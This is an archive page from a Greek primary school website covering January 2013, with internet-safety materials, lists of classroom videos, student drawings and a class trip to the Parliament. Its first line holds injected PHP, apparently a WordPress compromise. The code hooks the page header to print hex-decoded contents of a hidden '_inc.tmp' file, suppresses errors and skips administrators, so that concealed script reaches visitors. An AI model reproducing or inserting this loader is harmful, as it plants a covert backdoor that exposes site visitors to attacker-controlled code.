if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Ιανουάριος, 2013 |

Monthly Archives: Ιανουάριος 2013

Ασφαλεια στο Διαδίκτυο και Πληροφοριες

Ασφαλές Διαδίκτυο! Πάντα να ζητάς βοήθεια.

Βιντεο 1

Βιντεο 2

Βιντεο 3

Χρησιμες σελιδες για την σωστη Πλοηγηση στο Διαδικτυο

www.saferintenet.gr

Βίντεο για μαθήματα της ΣΤ Τάξης

ΦΥΣΙΚΗ

1. Τεχνολογικά Επιτεύγματα – Πετρελαιοπηγές του Μεξικού( 5΄02)
  2. ΝΟΤΙΟ ΠΕΔΙΟ 7 ( 7΄54)

ΓΕΩΓΡΑΦΙΑ

1. ΤΟ ΗΛΙΑΚΟ ΜΑΣ ΣΥΣΤΗΜΑ ( 4’26)
  2. Tο ηλιακό μας σύστημα – The solar System (4’50)
  3. Ice Age : Continental Drift – Trailer HD (2’47)
  4. Ηφαίστεια, Τεκτονικές πλάκες, Γεωθερμική ενέργεια (6’00)
  5. Σύγκρουση ηπειρωτικών πλακών (3’45)
  6. ΚΑΛΑΜΑΤΑ-ΣΕΙΣΜΟΣ 13 ΣΕΠΤΕΜΒΡΙΟΥ 1986 (12’43)

ΓΛΩΣΣΑ

1. Το ερωτευμένο σκιάχτρο ( 8’26)

Ασφάλεια στο Διαδίκτυο – Ημέρα Ασφαλούς Διαδικτύου 5 Φεβρουαρίου 2013

ΑΣΦΑΛΕΙΑ ΣΤΟ ΔΙΑΔΙΚΤΥΟ

Ζωγραφιες των μαθητων της Εκτης ταξης για την ασφαλεια στο Διαδικτυο
και για τη δημιουργια της αφισας για την ημερα του εορτασμου
της Ημέρας Ασφαλούς Διαδικτύου στις 5 Φεβρουαρίου 2013

Ζωγραφιές μαθητών για τα Χριστούγεννα

Ζωγραφιες που δημιουργησαν οι μαθητες στο μαθημα της Πληροφορικης για τα Χριστουγεννα.

Λέξεις Κλειδιά σε αναζητήσεις:

Παπασαράντης Κωνσταντίνος

Την Τετάρτη 31 Οκτωβρίου 2012, οι μαθητές της ΣΤ’ τάξης του σχολείου μας επισκέφθηκαν τη Βουλή των Ελλήνων.

Προηγήθηκε μια σύντομη ενημέρωση των μαθητών για την ιστορία του κτιρίου, την χρήση του τότε και σήμερα και ακολούθησε ξενάγηση σε Αρκετούς χώρους της Βουλής.

Στο τέλος τα παιδιά επισκέφθηκαν το Μνημείο του Άγνωστου Στρατιώτη και παρακολούθησαν με ιδιαίτερη έκπληξη την αλλαγή φρουράς των Ευζώνων.